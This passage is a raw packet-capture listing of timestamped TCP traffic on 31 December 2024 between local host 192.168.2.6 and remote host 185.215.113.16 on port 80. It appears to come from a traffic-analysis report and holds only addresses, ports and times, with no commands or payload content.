                                                                                                              Dec 31, 2024 09:48:43.820566893 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.820581913 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.820590973 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.820593119 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.820602894 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.820615053 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.820625067 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.820628881 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.820636034 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.820646048 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.820653915 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.820656061 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.820666075 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.820672035 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.820677042 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.820687056 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.820698023 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.820708036 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.820719004 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.820730925 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.820734024 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.820734024 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.820740938 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.820743084 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.820751905 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.820763111 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.820763111 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.820772886 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.820785999 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.820810080 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.820976019 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.820986986 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.820997000 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821007967 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821017981 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821024895 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.821027994 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821038961 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821043015 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.821055889 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.821108103 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821120024 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821130037 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821141005 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821141958 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.821151972 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821156025 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.821162939 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821172953 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821183920 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821185112 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.821193933 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821197987 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.821204901 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821214914 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821230888 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821240902 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.821240902 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821252108 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821268082 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821279049 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821288109 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.821289062 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821300030 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821310997 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821316004 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.821321011 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821331024 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821341038 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821351051 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821352005 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.821362019 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821372032 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821382999 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821393013 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821404934 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.821412086 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.821412086 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.821434975 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.856288910 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.856302023 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.856312037 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.856384039 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.856384039 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.858257055 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858268023 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858278990 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858289957 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858300924 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858310938 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.858311892 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858321905 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858331919 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858335972 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.858342886 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858360052 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.858370066 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858378887 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858388901 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858400106 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858407974 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.858407974 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858441114 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.858457088 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858473063 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858484030 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858493090 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858509064 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858509064 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.858519077 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858529091 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858536005 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.858540058 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858549118 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858550072 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.858560085 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858571053 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858582020 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858582020 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.858597040 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858608007 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.858624935 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.858634949 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858685017 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.858686924 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858696938 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858706951 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.858730078 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.859077930 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859095097 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859107018 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859117031 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859127998 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.859133005 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859153986 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.859168053 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.859173059 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859183073 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859193087 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859203100 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859210968 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.859220028 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859230995 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859237909 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.859242916 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859252930 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859263897 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859271049 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.859272957 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859299898 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.859359980 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859369993 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859380007 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859390974 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859394073 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.859401941 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859412909 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859421968 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859432936 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859441042 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.859453917 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.859469891 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.859486103 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859498024 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859508038 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859529972 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.859595060 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859603882 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859612942 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859622955 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859635115 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.859658957 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.859877110 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859888077 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859898090 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.859918118 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.859940052 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.860079050 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860095024 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860105991 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860116005 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860126019 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860126972 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.860136032 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860146999 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860152960 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.860156059 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860166073 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860167027 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.860176086 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860186100 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860193014 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.860196114 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860218048 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.860233068 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.860280037 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860291958 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860301971 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860325098 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.860351086 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860363007 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860373020 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860383034 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860394001 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860394001 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.860447884 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.860447884 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.860600948 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860637903 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860647917 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860670090 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.860743046 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860754013 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860764027 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860780001 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860785007 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.860790968 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860800028 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860807896 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.860816956 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860826969 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860827923 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.860837936 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860847950 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.860847950 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860858917 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860862017 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.860867977 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860879898 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860887051 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.860889912 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860901117 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860912085 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860913038 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.860927105 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.860934973 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860950947 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860966921 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860977888 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.860984087 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.860987902 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.861005068 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.861006975 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.861016035 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.861025095 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.861027956 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.861037016 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.861044884 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.861056089 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.861148119 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.861181021 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.861191034 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.861201048 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.861221075 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.861229897 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.861241102 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.861242056 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.861252069 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.861262083 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.861268997 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.861273050 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.861294031 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.861318111 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.861327887 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.861339092 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.861349106 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.861366987 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.905961990 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.905975103 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.905986071 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.906025887 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.906692028 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.981523037 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.981549978 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.981575966 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.981601954 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.981611967 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.981688023 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.983155012 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983181953 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983206034 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983228922 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.983247995 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983274937 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983297110 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.983325005 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983351946 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983375072 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983390093 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.983397961 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983414888 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.983423948 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983505011 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983520031 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.983529091 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983563900 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.983578920 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983613014 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983637094 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983650923 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.983656883 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983695030 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983705044 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.983717918 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983741045 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983750105 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.983763933 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983788013 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983807087 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.983824968 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983844995 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983858109 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.983880997 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983906031 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983922005 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.983926058 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983954906 CET8049754185.215.113.16192.168.2.6
                                                                                                              Dec 31, 2024 09:48:43.983968019 CET4975480192.168.2.6185.215.113.16
                                                                                                              Dec 31, 2024 09:48:43.983992100 CET8049754185.215.113.16192.168.2.6
